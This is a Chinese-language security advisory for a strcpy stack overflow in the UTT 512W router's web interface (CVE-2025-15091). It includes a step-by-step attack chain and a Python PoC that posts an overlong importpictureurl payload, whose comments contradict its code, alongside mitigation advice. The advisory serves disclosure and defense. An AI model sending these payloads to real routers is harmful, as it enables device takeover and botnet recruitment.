CVE-2025-15091 | UTT 进取512W路由器strcpy缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-15091

漏洞类型

缓冲区溢出

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

UTT 进取 512W

漏洞概述

CVE-2025-15091是影响UTT 进取512W路由器的一个高危缓冲区溢出漏洞。该漏洞存在于路由器的Web管理界面，具体位于/goform/formPictureUrl接口的strcpy函数中。攻击者可以通过构造恶意的importpictureurl参数值触发缓冲区溢出，成功利用此漏洞可实现远程代码执行。CVSS评分8.8，属于高危漏洞，具有网络远程攻击能力，且不需要高权限即可发起攻击。漏洞已于2025年12月26日公开披露，厂商尚未发布官方修复补丁。此漏洞影响使用该路由器型号的所有用户，尤其是开启了远程Web管理功能的用户面临较大风险。

技术细节

该漏洞是典型的基于栈的缓冲区溢出问题。在UTT 进取512W路由器的Web服务器进程中，处理/goform/formPictureUrl请求时，直接使用strcpy函数将用户输入的importpictureurl参数复制到固定大小的缓冲区中，而strcpy函数不进行边界检查。当攻击者提交超长字符串时，会覆盖相邻的栈内存区域，包括返回地址和函数指针等关键数据。攻击者可以通过精确构造溢出数据，覆盖返回地址使其指向恶意代码，从而在路由器上执行任意命令。由于该接口缺乏有效的输入验证和长度检查，攻击者可以在低权限条件下远程触发漏洞，获取设备最高权限。

攻击链分析

STEP 1

信息收集

攻击者首先识别目标路由器型号和版本，确认其为UTT 进取512W，并检测Web管理界面是否可访问

STEP 2

构造恶意请求

攻击者构造包含超长字符串的HTTP POST请求，参数importpictureurl的值远超预期缓冲区大小

STEP 3

触发缓冲区溢出

向/goform/formPictureUrl接口发送恶意请求，strcpy函数执行时发生缓冲区溢出，覆盖栈内存

STEP 4

控制流劫持

精心构造的溢出数据覆盖返回地址，劫持程序控制流使其跳转到攻击者植入的恶意代码

STEP 5

远程代码执行

攻击成功后在路由器上以root权限执行任意命令，可植入后门、窃取数据或组建僵尸网络

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-15091 PoC - UTT 进取 512W Buffer Overflow
# Target: /goform/formPictureUrl
# Vulnerability: strcpy buffer overflow via importpictureurl parameter

target_url = "http://<target_ip>/goform/formPictureUrl"

# Generate payload with NOP sled + shellcode + return address
# Adjust padding size based on target firmware
padding_size = 500  # May need adjustment

# Example: 32-byte padding to reach saved return address
payload = "A" * padding_size
payload += "\x42\x42\x42\x42"  # Overwrite return address (target-specific)

data = {
    "importpictureurl": payload
}

try:
    response = requests.post(target_url, data=data, timeout=10)
    print(f"[*] Request sent to {target_url}")
    print(f"[*] Payload length: {len(payload)}")
    print(f"[*] Response status: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"[!] Error: {e}")

影响范围

UTT 进取 512W < 1.7.7-171114

防御指南

临时缓解措施

立即禁用路由器的远程Web管理功能（WAN口访问），限制只能通过局域网内部访问管理界面。在边界防火墙上阻断对路由器80/443端口的外部访问，并持续监控设备日志以发现潜在的利用尝试。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15091
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15091
3 Details https://www.cvedetails.com/cve/CVE-2025-15091/
4 VulDB https://vuldb.com/cve/CVE-2025-15091
5 Link https://github.com/cymiao1978/cve/blob/main/new/16.md
6 Link https://github.com/cymiao1978/cve/blob/main/new/16.md#poc
7 Link https://vuldb.com/?ctiid.338420
8 Link https://vuldb.com/?id.338420
9 Link https://vuldb.com/?submit.708350
10 Link https://github.com/cymiao1978/cve/blob/main/new/16.md#poc